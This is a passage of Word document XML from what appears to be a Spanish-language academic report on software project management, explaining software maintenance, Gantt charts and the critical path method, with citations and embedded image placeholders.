          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Mantenimiento</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="201A1B"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>: el software sufrirá cambios después de que se entrega al cliente. Los cambios ocurrirán debidos a que se haya encontrado errores, a que el software deba adaptarse a cambios del entorno externo (sistema operativo o dispositivos periféricos) o a que el cliente requiera ampliaciones funcionales o del rendimiento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRPr="00977053" w:rsidRDefault="00DA02C8" w:rsidP="00B95CD1">
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA02C8">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc514520858"/>
      <w:r w:rsidRPr="00977053">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Diagrama de Gantt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755"/>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755"/>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A67755">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Es una herramienta para </w:t>
      </w:r>
      <w:r w:rsidRPr="00A67755">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>planificar y programar tareas</w:t>
      </w:r>
      <w:r w:rsidRPr="00A67755">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t> a lo largo de un período determinado. Gracias a una fácil y cómoda visualización de las acciones previstas, permite realizar el seguimiento y control del progreso de cada una de las etapas de un proyecto y, además, reproduce gráficamente las tareas, su duración y secuencia, además del calendario general del proyecto.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:id w:val="1575783194"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00A67755">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00A67755">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Que16 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00A67755">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>(Barcelona, 2016)</w:t>
          </w:r>
          <w:r w:rsidRPr="00A67755">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A67755">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="382C93EE" wp14:editId="2133F664">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1291590</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>149335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2867025" cy="1863725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="47" name="Imagen 47" descr="H:\Image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Image4.gif"/>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867025" cy="1863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67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A67755">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Justificación: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A67755">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Este tipo de diagrama es importante durante el desarrollo de proyectos ya sean para TI o de otros tipos de proyectos, ya que nos ayuda a sistematizar las actividades y llevar un control de las misma. Y así mismo tener un control respecto a la comunicación dentro del proyecto. Además de conocer un presupuesto, que recursos se van a tomar en cuenta para poder desarrollarlo entro otras cosas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE3402" w:rsidRPr="00977053" w:rsidRDefault="00BE3402" w:rsidP="00B95CD1"/>
    <w:p w:rsidR="00B95CD1" w:rsidRPr="00977053" w:rsidRDefault="00B95CD1" w:rsidP="00B95CD1">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc514520859"/>
      <w:r w:rsidRPr="00977053">
        <w:rPr>
          <w:rFonts w:cs="Tahoma"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Diagrama de ruta crítica</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w:rsidR="00A67755" w:rsidRPr="00A67755" w:rsidRDefault="00A67755" w:rsidP="00A67755"/>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una herramienta que me permita estimar el tiempo más corto en el que es posible completar un proyecto es el método de la ruta crítica (CPM-Critical Path Method) o del camino crítico. Este es un  algoritmo utilizado para el cálculo de tiempos y plazos en la planificación de proyectos. El objetivo principal es determinar la duración de un proyecto, donde cada una de las actividades del mismo tiene una duración estimada. La duración de las actividades que forman la ruta crítica determina la duración del proyecto entero y las diferencias con las otras rutas que no sean la crítica se denominan tiempos de holgura. Un proyecto puede tener más de una ruta crítica.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El método de la ruta crítica usa tiempos ciertos o estimados y consiste prácticamente en:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Identificar todas las actividades que involucra el proyecto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Establecer relaciones entre las actividades. Decidir cuál debe comenzar antes y cuál debe seguir después.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Construir una red o diagrama conectando las diferentes actividades a sus relaciones de precedencia.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Definir costos y tiempo estimado para cada actividad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Identificar la ruta crítica y las holguras de las actividades que componen el proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Utilizar el diagrama como ayuda para planear, supervisar y controlar el proyecto.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:id w:val="1108928216"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="002C4C69">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="002C4C69">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Luz13 \l 2058 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="002C4C69">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="009E53AE" w:rsidRPr="009E53AE">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:t>(Torres, 2013)</w:t>
          </w:r>
          <w:r w:rsidRPr="002C4C69">
            <w:rPr>
              <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
              <w:color w:val="auto"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="60097BA4" wp14:editId="66D9234F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1430042</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>548</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2924175" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="48" name="Imagen 48" descr="H:\índice.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índice.jf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924175" cy="1562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C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
